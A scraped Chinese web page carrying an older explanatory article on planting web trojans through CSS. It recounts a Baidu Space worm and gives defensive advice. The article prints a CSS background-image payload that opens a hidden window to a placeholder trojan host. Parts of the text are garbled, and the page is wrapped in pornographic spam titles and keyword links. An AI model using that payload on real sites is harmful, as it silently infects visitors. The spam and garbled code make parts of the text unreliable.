国产国语高清在线视频二区_亚洲国产精品国产自在在线 _91在线免费公开视频_男女晚上日日麻批视频不挡

建站心得


警惕CSS掛馬攻擊 CSS掛馬攻防實(shí)戰(zhàn)全面解析


黑客們發(fā)現(xiàn)發(fā)現(xiàn),用來制作網(wǎng)頁特效的CSS代碼,也可以用來掛馬。

隨著Web2.0的普及,各種網(wǎng)頁特效用得越來越多,這也給黑客一個可乘之機(jī)。他們發(fā)現(xiàn),用來制作網(wǎng)頁特效的CSS代碼,也可以用來掛馬。而比較諷刺的是,CSS掛馬方式其實(shí)是從防范E掛馬的CSS代碼演變而來。

網(wǎng)站掛馬的手段最初非常單一,但是隨著Web2.0技術(shù)以及Blog、Wiki等廣泛的應(yīng)用,掛馬也涌現(xiàn)出各種各樣的技術(shù),其中CSS掛馬方式,可以說是Web2.0時代黑客的最愛。有許多非常著名的網(wǎng)站都被黑客用CSS掛馬入侵過。

在我印象中,記憶最深刻的一次是百度空間CSS掛馬。當(dāng)時,百度空間推出沒有多久,就有許多百度用戶收到了類似“哈,節(jié)日快樂呀!熱烈慶祝2008,心情好好,記住要想我!http://hi.baidu.com/XXXXX”的站內(nèi)消息。

由于網(wǎng)址是百度空間的網(wǎng)址,許多用戶認(rèn)為不會存在安全問題,加上又有可能是自己朋友發(fā)來的,因此會毫不猶豫地點(diǎn)擊進(jìn)入。但是進(jìn)入指定的網(wǎng)址后,用戶就會感染蠕蟲病毒,并繼續(xù)傳播。

由于蠕蟲擴(kuò)散非常嚴(yán)重,最終導(dǎo)致百度空間不得不發(fā)布官方聲明提醒用戶,并且大費(fèi)周折地在服務(wù)器中清除蠕蟲的惡意代碼。那一次的掛馬事件利用的就是百度空間CSS模板功能,通過變形的expression在CSS代碼中動態(tài)執(zhí)行腳本,讓指定的遠(yuǎn)程惡意代碼文件在后臺悄悄運(yùn)行并發(fā)送大量偽造信息。

我建議大家在點(diǎn)擊陌生鏈接時,要多個心眼,大網(wǎng)站也是可能被掛馬的。大家在上網(wǎng)時,最好還是使用一些帶網(wǎng)頁木馬攔截功能的安全輔助工具。

黑客為什么選擇CSS掛馬?

在Web1.0時代,使用E掛馬對于黑客而言,與其說是為了更好地實(shí)現(xiàn)木馬的隱藏,倒不如說是無可奈何的一個選擇。在簡單的HTML網(wǎng)頁和缺乏交互性的網(wǎng)站中,黑客可以利用的手段也非常有限,即使采取了復(fù)雜的偽裝,也很容易被識破,還不如E來得直接和有效。

但如今交互式的Web2.0網(wǎng)站越來越多,允許用戶設(shè)置與修改的博客、SNS社區(qū)等紛紛出現(xiàn)。這些互動性非常強(qiáng)的社區(qū)和博客中,往往會提供豐富的功能,并且會允許用戶使用CSS層疊樣式表來對網(wǎng)站的網(wǎng)頁進(jìn)行自由的修改,這促使了CSS掛馬流行。

小百科:

CSS是層疊樣式表(CascadingStyleSheets)的英文縮寫。CSS最主要的目的是將文件的結(jié)構(gòu)(用HTML或其他相關(guān)語言寫的)與文件的顯示分隔開來。這個分隔可以讓文件的可讀性得到加強(qiáng)、文件的結(jié)構(gòu)更加靈活。

黑客在利用CSS掛馬時,往往是借著網(wǎng)民對某些大網(wǎng)站的信任,將CSS惡意代碼掛到博客或者其他支持CSS的網(wǎng)頁中,當(dāng)網(wǎng)民在訪問該網(wǎng)頁時惡意代碼就會執(zhí)行。這就如同你去一家知名且證照齊全的大醫(yī)院看病,你非常信任醫(yī)院,但是你所看的門診卻已經(jīng)被庸醫(yī)外包了下來,并且打著醫(yī)院的名義利用你的信任成功欺騙了你。但是當(dāng)你事后去找人算賬時,醫(yī)院此時也往往一臉無辜。對于安全工程師而言,CSS掛馬的排查是必備常識。

[nextpage_tab]

CSS掛馬攻防實(shí)錄

攻CSS掛馬方式較多,但主流的方式是通過有漏洞的博客或者SNS社交網(wǎng)站系統(tǒng),將惡意的CSS代碼寫入支持CSS功能的個性化頁面中。下面我們以典型的CSS掛馬方式為例進(jìn)行講解。

方式1:

Body

“background-image”在CSS中的主要功能是用來定義頁面的背景圖片。這是最典型的CSS掛馬方式,這段惡意代碼主要是通過“background-image”配合t代碼讓網(wǎng)頁木馬悄悄地在用戶的電腦中運(yùn)行。

那如何將這段CSS惡意代碼掛到正常的網(wǎng)頁中去呢?黑客可以將生成好的網(wǎng)頁木馬放到自己指定的位置,然后將該段惡意代碼寫入掛馬網(wǎng)站的網(wǎng)頁中,或者掛馬網(wǎng)頁所調(diào)用的CSS文件中。

小百科:

使用Body對象元素,主要是為了讓對象不再改變整個網(wǎng)頁文檔的內(nèi)容,通過Body對象的控制,可以將內(nèi)容或者效果控制在指定的大小內(nèi),如同使用DIV對象那樣精確地設(shè)置大小。

方式2:

Body

background-image:url(t:open(”http://www.X.com/muma.htm”,”newwindow”,”border=”1″Height=0,Width=0,top=1000,center=0,toolbar=no,menubar=no,scrollbars=no,resizable=no,location=no,status=no”))

方式1的CSS掛馬技術(shù),在運(yùn)行時會出現(xiàn)空白的頁面,影響網(wǎng)頁訪問者正常的訪問,因此比較容易發(fā)現(xiàn)。不過在方式2中的這段代碼,使用了t的Open開窗,通過新開一個隱藏的窗口,在后臺悄悄地運(yùn)行新窗口并激活訪問網(wǎng)頁溢出木馬頁面,不會影響訪問者觀看網(wǎng)頁內(nèi)容,因此更加隱蔽。

防網(wǎng)絡(luò)服務(wù)器被掛馬,通常會出現(xiàn)防病毒軟件告警之類的信息。由于漏洞不斷更新,掛馬種類時刻都在變換,通過客戶端的反映來發(fā)現(xiàn)服務(wù)器是否被掛馬往往疏漏較大。正確的做法是經(jīng)常檢查服務(wù)器日志,發(fā)現(xiàn)異常信息,經(jīng)常檢查網(wǎng)站代碼,使用網(wǎng)頁木馬檢測系統(tǒng),進(jìn)行排查。

目前除了使用以前的阻斷彈出窗口防范CSS掛馬之外,還可以在網(wǎng)頁中設(shè)置CSS過濾,將CSS過濾掉。不過如果你選擇過濾CSS的話,首先需要留意自己的相關(guān)網(wǎng)頁是否有CSS的內(nèi)容,因此我們?nèi)匀皇淄朴米钄喾绞絹矸婪禖SS.阻斷代碼如下所示:

emiao1:expression(this.src=”about:blank”,this.outerHTML=”“);

將外域的木馬代碼的src重寫成本地IE404錯誤頁面的地址,這樣,外域的t代碼不會被下載。不過阻斷方式也有天生致命的弱點(diǎn),弱點(diǎn)的秘密我們將于下次揭曉。(作者:Barry)


相關(guān)文章

首頁  電話  咨詢  頂部
国产国语高清在线视频二区_亚洲国产精品国产自在在线 _91在线免费公开视频_男女晚上日日麻批视频不挡

                久久久久成人网| 国产日韩在线观看av| 国产成人精品网站| 国产成人精彩在线视频九色| 久久亚裔精品欧美| 久久频这里精品99香蕉| 国产二区一区| 国产成人精品最新| 久久久精品有限公司| 国产超碰91| www欧美日韩| 国产精品美女av| 久久97久久97精品免视看| 欧美精品在线看| 欧美激情亚洲精品| 亚洲福利av在线| 日韩福利一区二区三区| 欧美亚洲丝袜| 欧美亚洲第一页| 国模无码视频一区二区三区| 麻豆中文字幕在线观看| 国产视频九色蝌蚪| 91麻豆精品秘密入口| 99国产盗摄| 国产成人91久久精品| 国产精品免费视频久久久| 久久久久久国产精品| 三级网在线观看| 黄色网在线视频| 俄罗斯精品一区二区| 国产精品999999| 国产成人无码精品久久久性色| 国产精品视频一区二区高潮| 精品国产无码在线| 亚洲狠狠婷婷综合久久久| 欧洲亚洲一区二区| 精品一区二区不卡| 成人av中文| 国产成人亚洲欧美| 国产精品久久久久久久免费大片| 国产中文欧美精品| 97久久精品人搡人人玩| 精品国产一区久久久| 这里只有精品66| 青青在线视频免费| 97碰在线视频| 国产精品久久久久久久app| 亚洲自拍小视频| 青青在线视频免费| 俄罗斯精品一区二区| www.亚洲免费视频| 中文字幕精品在线播放| 欧美亚洲国产日本| 国产精品99久久久久久大便| 国产精品二区在线| 欧在线一二三四区| 91国自产精品中文字幕亚洲| 久久五月天综合| 日韩伦理一区二区三区av在线| 国产日韩中文在线| www国产亚洲精品久久网站| 亚洲自偷自拍熟女另类| 国内一区二区三区在线视频 | 国产一区二区四区| 久草一区二区| 亚洲.欧美.日本.国产综合在线 | 国产午夜福利视频在线观看| 国产高清在线精品一区二区三区| 一区二区三区在线观看www| 黄色网页免费在线观看| 久久久久久尹人网香蕉| 性欧美激情精品| 97精品欧美一区二区三区| 一区二区三区欧美在线| 国产欧美日韩综合精品| 美女福利视频一区| 国产日韩精品在线| 九九久久久久久久久激情| 国内精品模特av私拍在线观看| 九色91国产| 日韩中文字幕在线视频观看| 91国产精品视频在线| 一区二区在线观| 国产美女无遮挡网站| 欧美成人在线免费| 国精产品一区一区三区视频| 久久精品99久久久久久久久| 热久久精品免费视频| 久久精品日韩| 日韩免费视频播放| 色噜噜国产精品视频一区二区 | 国产精品露出视频| 欧美亚洲另类在线一区二区三区| 国产成人中文字幕| 日本精品一区二区三区四区| 久久精品国产第一区二区三区最新章节| 亚洲 欧洲 日韩| 久久免费视频在线观看| 欧美一区二区三区图| 8050国产精品久久久久久| 婷婷五月综合缴情在线视频| 久久综合久久色| 日韩区国产区| 久久天天躁狠狠躁夜夜爽蜜月| 欧美亚洲另类激情另类| 国产精品无码乱伦| 欧美精品成人网| 国产精品美女在线观看| 国产在线观看一区二区三区| 欧美日韩国产va另类| 99精彩视频| 日本欧美在线视频| 国产精品网红福利| 国产乱子伦精品| 视频在线99re| 国产精品三级美女白浆呻吟| 国产一区视频观看| 一本色道婷婷久久欧美| 久久久亚洲欧洲日产国码aⅴ| 日本国产在线播放| 国产精品男女猛烈高潮激情| 国产在线精品一区二区三区| 亚洲人成网站在线播放2019| 久久亚洲国产精品日日av夜夜| 欧美一区激情视频在线观看| 蜜臀久久99精品久久久无需会员| 8050国产精品久久久久久| 欧美日韩精品一区| 美日韩精品免费视频| 国产成人aa精品一区在线播放| 国内精品久久久久久| 亚洲熟妇无码一区二区三区| 视频在线观看99| 国产伦精品一区二区三区四区免费| 午夜精品久久久内射近拍高清| 色青青草原桃花久久综合| 国内精品久久久久久久| 亚洲国产精品综合| 国产精品久久久久久av下载红粉 | 国产成人一区二区三区免费看 | 亚洲精品成人a8198a| 色妞久久福利网| 国产精品夜夜夜一区二区三区尤| 日本一本中文字幕| 欧美日韩电影在线观看| 久久久久久久久久久一区| 国产精品一区二区免费在线观看| 日本一区二区三区精品视频| 欧美巨猛xxxx猛交黑人97人| 色偷偷噜噜噜亚洲男人| 99视频免费观看| 精品午夜一区二区三区| 欧美重口乱码一区二区| 亚洲欧美日韩另类精品一区二区三区 | 国产精品揄拍500视频| 欧美一二三区| 日本一区二区三区四区高清视频| 久久久久久国产精品| 日韩在线视频国产| 8050国产精品久久久久久| 国产精品中文久久久久久久| 欧美xxxx黑人又粗又长精品 | 少妇大叫太大太粗太爽了a片小说| 久久不射电影网| 国产精品偷伦免费视频观看的| 91麻豆蜜桃| 官网99热精品| 国产欧美在线一区二区| 欧美日本韩国一区二区三区| 日韩福利二区| 肉大捧一出免费观看网站在线播放| 国产精品国产三级国产专播精品人| 久久久久久网址| 国产不卡av在线| 久久久久久久久久久久久9999| 91九色在线观看| 91久久综合亚洲鲁鲁五月天| 97精品国产97久久久久久粉红| 国产裸体舞一区二区三区| 国产一区二区四区| 国产欧美亚洲精品| 国产欧美日韩最新| 国产精品揄拍一区二区| 成人福利视频网| 99久久99久久| caopor在线视频| 成人精品视频久久久久| 成人动漫在线视频| 97碰在线视频| 国产成人在线视频| 啊v视频在线一区二区三区 | 日韩免费黄色av| 欧洲黄色一级视频| 精品欧美国产一区二区三区不卡| 欧美二区三区| 麻豆成人在线播放| 超碰97国产在线| 久久亚裔精品欧美| 久久久久久美女| 久青草国产97香蕉在线视频|